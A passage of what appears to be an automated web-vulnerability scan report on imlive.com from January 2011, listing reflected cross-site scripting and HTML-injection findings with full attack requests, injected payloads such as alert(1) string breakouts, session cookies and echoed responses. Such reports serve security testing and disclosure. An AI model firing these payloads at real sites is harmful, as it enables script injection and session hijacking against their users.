GET /become_host.asp?8175d"><a>ad0c10fb84f=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:25:23 GMT Connection: close Content-Length: 21593 Vary: Accept-Encoding
2.56. http://imlive.com/becomehost.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /becomehost.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbb67'-alert(1)-'15501fee645 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /becomehost.aspx?cbb67'-alert(1)-'15501fee645=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:59 GMT Connection: close Content-Length: 21781 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/becomehost.aspx&he=imlive.com&ul=/becomehost.aspx?cbb67'-alert(1)-'15501fee645=1&qs=cbb67'-alert(1)-'15501fee645=1&qs=cbb67'-alert(1)-'15501fee645=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function ...[SNIP]...
2.57. http://imlive.com/becomehost.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /becomehost.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae13c"><a>8ef4c400f3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /becomehost.aspx?ae13c"><a>8ef4c400f3a=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:56 GMT Connection: close Content-Length: 21593 Vary: Accept-Encoding
2.58. http://imlive.com/categoryfs.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /categoryfs.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1290d'><a>0243a0c9435 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /categoryfs.asp?cat=232&1290d'><a>0243a0c9435=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:30 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:30 GMT Connection: close Content-Length: 18966 Vary: Accept-Encoding
<html> <head> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <title>Find Friends & Romance on Live Webcam Video Chat at ImLive</title> <meta name="d ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryfs.asp?cat=232^1290d'><a>0243a0c9435=1&lr=1107816009&ud=0&pe=categoryfs.asp&qs=cat=232^1290d'> ...[SNIP]...
2.59. http://imlive.com/categoryms.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /categoryms.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 61172'><a>3b9652ee722 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /categoryms.asp?cat=2&61172'><a>3b9652ee722=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:32 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:32 GMT Connection: close Content-Length: 21858 Vary: Accept-Encoding
<html> <head> <title>Mysticism & Spirituality Live Video Chat at ImLive</title> <META NAME="Description" CONTENT="Live video chat with Mysticism & Spirituality experts. Astrologers, Psychics ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryms.asp?cat=2^61172'><a>3b9652ee722=1&lr=1107816009&ud=0&pe=categoryms.asp&qs=cat=2^61172'> ...[SNIP]...
2.60. http://imlive.com/celebrity-porn-stars/celebrity-events/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /celebrity-porn-stars/celebrity-events/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db582'-alert(1)-'4b3c1d175fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /celebrity-porn-stars/celebrity-events/?db582'-alert(1)-'4b3c1d175fb=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:59 GMT Connection: close Content-Length: 2667 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> War ...[SNIP]... <script type="text/javascript"> function IAgree(){document.location.href='?meAgree=yes&redirect=%2fcelebrity-porn-stars%2fcelebrity-events%2f%3fdb582'-alert(1)-'4b3c1d175fb%3d1'; return false;} function IDontAgree() { window.parent.location.href = "/"; return false; } </script> ...[SNIP]...
2.61. http://imlive.com/disclaimer.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /disclaimer.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cd26f'><a>d83acef05af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /disclaimer.asp?cd26f'><a>d83acef05af=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:16 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:16 GMT Connection: close Content-Length: 78891 Vary: Accept-Encoding
<html> <head> <title>Disclaimer - Live Video Chat at ImLive</title>
<link rel="stylesheet" typ ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/disclaimer.asp?cd26f'><a>d83acef05af=1&lr=1107816009&ud=0&pe=disclaimer.asp&qs=cd26f'> ...[SNIP]...
2.62. http://imlive.com/forgot.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /forgot.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e80f3'-alert(1)-'c0da0968686 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forgot.aspx?e80f3'-alert(1)-'c0da0968686=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:11:43 GMT Connection: close Content-Length: 3338 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> Imlive.com Customer Serv ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/forgot.aspx&he=imlive.com&ul=/forgot.aspx?e80f3'-alert(1)-'c0da0968686=1&qs=e80f3'-alert(1)-'c0da0968686=1&qs=e80f3'-alert(1)-'c0da0968686=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function ...[SNIP]...
2.63. http://imlive.com/homepagems3.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /homepagems3.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e62a5"><a>8b3d580d15c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /homepagems3.asp?e62a5"><a>8b3d580d15c=1 HTTP/1.1 Host: imlive.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000
2.64. http://imlive.com/homepagems3.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /homepagems3.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6ef1f'><a>f607da23703 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /homepagems3.asp?6ef1f'><a>f607da23703=1 HTTP/1.1 Host: imlive.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000
2.65. http://imlive.com/live-sex-chats/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66ff1"><a>7cdd9e5718 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
